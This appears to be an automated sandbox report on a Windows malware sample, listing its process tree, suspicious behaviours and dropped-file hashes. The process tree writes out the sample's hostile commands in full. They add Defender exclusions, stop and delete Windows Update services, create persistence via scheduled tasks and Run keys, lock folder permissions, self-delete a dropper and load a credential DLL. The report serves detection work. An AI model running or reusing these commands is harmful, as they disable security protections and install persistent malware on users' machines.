powercfg.exe Token: SeShutdownPrivilege 2660 powercfg.exe Token: SeCreatePagefilePrivilege 2660 powercfg.exe Token: SeShutdownPrivilege 3172 powercfg.exe Token: SeCreatePagefilePrivilege 3172 powercfg.exe Token: SeIncreaseQuotaPrivilege 4776 powershell.exe Token: SeSecurityPrivilege 4776 powershell.exe Token: SeTakeOwnershipPrivilege 4776 powershell.exe Token: SeLoadDriverPrivilege 4776 powershell.exe Token: SeSystemProfilePrivilege 4776 powershell.exe Token: SeSystemtimePrivilege 4776 powershell.exe Token: SeProfSingleProcessPrivilege 4776 powershell.exe Token: SeIncBasePriorityPrivilege 4776 powershell.exe Token: SeCreatePagefilePrivilege 4776 powershell.exe Token: SeBackupPrivilege 4776 powershell.exe Token: SeRestorePrivilege 4776 powershell.exe Token: SeShutdownPrivilege 4776 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeSystemEnvironmentPrivilege 4776 powershell.exe Token: SeRemoteShutdownPrivilege 4776 powershell.exe Token: SeUndockPrivilege 4776 powershell.exe Token: SeManageVolumePrivilege 4776 powershell.exe Token: 33 4776 powershell.exe Token: 34 4776 powershell.exe Token: 35 4776 powershell.exe Token: 36 4776 powershell.exe Token: SeIncreaseQuotaPrivilege 4776 powershell.exe Token: SeSecurityPrivilege 4776 powershell.exe Token: SeTakeOwnershipPrivilege 4776 powershell.exe Token: SeLoadDriverPrivilege 4776 powershell.exe Token: SeSystemProfilePrivilege 4776 powershell.exe Token: SeSystemtimePrivilege 4776 powershell.exe Token: SeProfSingleProcessPrivilege 4776 powershell.exe Token: SeIncBasePriorityPrivilege 4776 powershell.exe Token: SeCreatePagefilePrivilege 4776 powershell.exe Token: SeBackupPrivilege 4776 powershell.exe Token: SeRestorePrivilege 4776 powershell.exe Token: SeShutdownPrivilege 4776 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeSystemEnvironmentPrivilege 4776 powershell.exe Token: SeRemoteShutdownPrivilege 4776 powershell.exe Token: SeUndockPrivilege 4776 powershell.exe Token: SeManageVolumePrivilege 4776 powershell.exe Token: 33 4776 powershell.exe Token: 34 4776 powershell.exe Token: 35 4776 powershell.exe Token: 36 4776 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 3892 rundll32.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Explorer.EXEpid process 676 Explorer.EXE 676 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exePlayer3.exenbveek.exeslwang.execmd.exerundll32.exerandom.exerundll32.exedescription pid process target process PID 4268 wrote to memory of 592 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe Player3.exe PID 4268 wrote to memory of 592 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe Player3.exe PID 4268 wrote to memory of 592 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe Player3.exe PID 4268 wrote to memory of 932 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe pb1111.exe PID 4268 wrote to memory of 932 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe pb1111.exe PID 4268 wrote to memory of 1260 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe slwang.exe PID 4268 wrote to memory of 1260 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe slwang.exe PID 4268 wrote to memory of 1260 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe slwang.exe PID 592 wrote to memory of 1412 592 Player3.exe nbveek.exe PID 592 wrote to memory of 1412 592 Player3.exe nbveek.exe PID 592 wrote to memory of 1412 592 Player3.exe nbveek.exe PID 4268 wrote to memory of 3028 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe birge.exe PID 4268 wrote to memory of 3028 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe birge.exe PID 4268 wrote to memory of 3028 4268 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe birge.exe PID 1412 wrote to memory of 204 1412 nbveek.exe schtasks.exe PID 1412 wrote to memory of 204 1412 nbveek.exe schtasks.exe PID 1412 wrote to memory of 204 1412 nbveek.exe schtasks.exe PID 1412 wrote to memory of 2996 1412 nbveek.exe cmd.exe PID 1412 wrote to memory of 2996 1412 nbveek.exe cmd.exe PID 1412 wrote to memory of 2996 1412 nbveek.exe cmd.exe PID 1260 wrote to memory of 1876 1260 slwang.exe slwang.exe PID 1260 wrote to memory of 1876 1260 slwang.exe slwang.exe PID 1260 wrote to memory of 1876 1260 slwang.exe slwang.exe PID 2996 wrote to memory of 3760 2996 cmd.exe cmd.exe PID 2996 wrote to memory of 3760 2996 cmd.exe cmd.exe PID 2996 wrote to memory of 3760 2996 cmd.exe cmd.exe PID 2996 wrote to memory of 3512 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 3512 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 3512 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 1020 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 1020 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 1020 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 4832 2996 cmd.exe cmd.exe PID 2996 wrote to memory of 4832 2996 cmd.exe cmd.exe PID 2996 wrote to memory of 4832 2996 cmd.exe cmd.exe PID 2996 wrote to memory of 2740 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 2740 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 2740 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 2296 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 2296 2996 cmd.exe cacls.exe PID 2996 wrote to memory of 2296 2996 cmd.exe cacls.exe PID 1412 wrote to memory of 4048 1412 nbveek.exe pb1111.exe PID 1412 wrote to memory of 4048 1412 nbveek.exe pb1111.exe PID 4420 wrote to memory of 4156 4420 rundll32.exe rundll32.exe PID 4420 wrote to memory of 4156 4420 rundll32.exe rundll32.exe PID 4420 wrote to memory of 4156 4420 rundll32.exe rundll32.exe PID 1412 wrote to memory of 3968 1412 nbveek.exe random.exe PID 1412 wrote to memory of 3968 1412 nbveek.exe random.exe PID 1412 wrote to memory of 3968 1412 nbveek.exe random.exe PID 3968 wrote to memory of 4608 3968 random.exe random.exe PID 3968 wrote to memory of 4608 3968 random.exe random.exe PID 3968 wrote to memory of 4608 3968 random.exe random.exe PID 1412 wrote to memory of 3436 1412 nbveek.exe XandETC.exe PID 1412 wrote to memory of 3436 1412 nbveek.exe XandETC.exe PID 4520 wrote to memory of 2900 4520 rundll32.exe rundll32.exe PID 4520 wrote to memory of 2900 4520 rundll32.exe rundll32.exe PID 4520 wrote to memory of 2900 4520 rundll32.exe rundll32.exe PID 1412 wrote to memory of 4152 1412 nbveek.exe ChromeSetup.exe PID 1412 wrote to memory of 4152 1412 nbveek.exe ChromeSetup.exe PID 1412 wrote to memory of 4152 1412 nbveek.exe ChromeSetup.exe PID 1412 wrote to memory of 4216 1412 nbveek.exe download.exe PID 1412 wrote to memory of 4216 1412 nbveek.exe download.exe PID 1412 wrote to memory of 4216 1412 nbveek.exe download.exe PID 1412 wrote to memory of 64 1412 nbveek.exe download.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe"C:\Users\Admin\AppData\Local\Temp\2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe"C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe" & exit6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 20046⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 18766⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe"C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe"5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3784 -s 6887⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\pb1111.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\slwang.exe"C:\Users\Admin\AppData\Local\Temp\slwang.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\slwang.exe"C:\Users\Admin\AppData\Local\Temp\slwang.exe" -h4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\birge.exe"C:\Users\Admin\AppData\Local\Temp\birge.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\36A0.exeC:\Users\Admin\AppData\Local\Temp\36A0.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 237514⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 4003⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4156 -ip 41561⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2900 -ip 29001⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4216 -ip 42161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4216 -ip 42161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 3784 -ip 37841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 520 -ip 5201⤵
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\ProgramData\mozglue.dllFilesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
C:\ProgramData\nss3.dllFilesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
